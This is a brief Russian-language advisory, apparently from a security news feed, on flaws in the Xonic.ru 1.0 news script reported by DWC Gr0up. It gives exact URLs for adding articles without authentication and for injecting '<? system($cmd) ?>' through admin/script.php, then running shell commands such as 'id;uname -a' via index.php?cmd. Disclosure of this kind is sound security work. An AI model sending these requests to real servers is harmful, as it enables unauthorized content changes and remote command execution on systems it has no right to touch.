DWC Gr0up сообщил об уязвимости в Xonic.ru. Удаленный пользователь может добавлять статьи и выполнять произвольные команды на сервере. 

Удаленный пользователь может добавить статьи без предварительной авторизации, используя следующий URL: 

http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.

Также удаленный пользователь может выполнить произвольный PHP код, включая команды оболочки, на целевом сервере: 

http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?>
http://[target]/index.php?cmd=id;uname -a;

Уязвимость обнаружена в Xonic.ru 1.0.



Оставить мнение